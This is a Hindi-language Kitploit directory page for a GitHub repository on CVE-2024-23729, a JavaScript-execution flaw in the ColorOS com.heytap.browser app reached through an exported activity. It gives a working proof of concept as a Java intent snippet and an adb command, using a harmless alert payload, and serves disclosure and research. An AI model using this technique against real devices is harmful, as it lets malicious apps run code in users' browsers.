Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
com.heytap.browser — CVE-2024-23729 | Kitploit
उपकरण/GitHubGitHub/actuator/com.heytap.browser
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमोबाइल सुरक्षा
GitHubactuator/com.heytap.browser

com.heytap.browser

CVE-2024-23729

रिपॉजिटरी देखें
81 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता रिपोर्ट

अवलोकन:

एंड्रॉइड प्लेटफॉर्म पर com.heytap.browser एप्लिकेशन में एक भेद्यता पाई गई है। यह भेद्यता हमलावर को बिना किसी अनुमति के एप्लिकेशन के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती है।

एप्लिकेशन विवरण:

  • विक्रेता: - ColorOS
  • एप्लिकेशन का नाम: 'Internet Browser' com.heytap.browser
  • संस्करण: 45.10.3.4.1
  • घटक: com.android.browser.RealBrowserActivity

भेद्यता विवरण:

  • भेद्यता प्रकार: जावास्क्रिप्ट कोड निष्पादन
  • हमला वेक्टर: एक निर्यातित गतिविधि घटक के माध्यम से
  • आवश्यक अनुमतियाँ: कोई नहीं

विवरण:

com.heytap.browser ऐप में com.android.browser.RealBrowserActivity गतिविधि निर्यातित है और किसी भी तीसरे पक्ष के एप्लिकेशन द्वारा बिना किसी अनुमति के इसका आह्वान किया जा सकता है। एक दुर्भावनापूर्ण ऐप इसका उपयोग com.heytap.browser एप्लिकेशन के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करने के लिए कर सकता है।

प्रूफ ऑफ कॉन्सेप्ट (PoC):

root@kitploit:~
{
        super.onCreate(savedInstanceState);

        String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";

        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(javaScriptCommand));
        intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");

        startActivity(intent);

        finish();
    }
root@kitploit:~

adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

com heytap browser- 45 10 3 4 1-JS poc-coloros

प्रभाव:

सफल शोषण हमलावर को निम्नलिखित की अनुमति देता है:

  • com.heytap.browser ऐप के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करना।
टूल डाउनलोड करें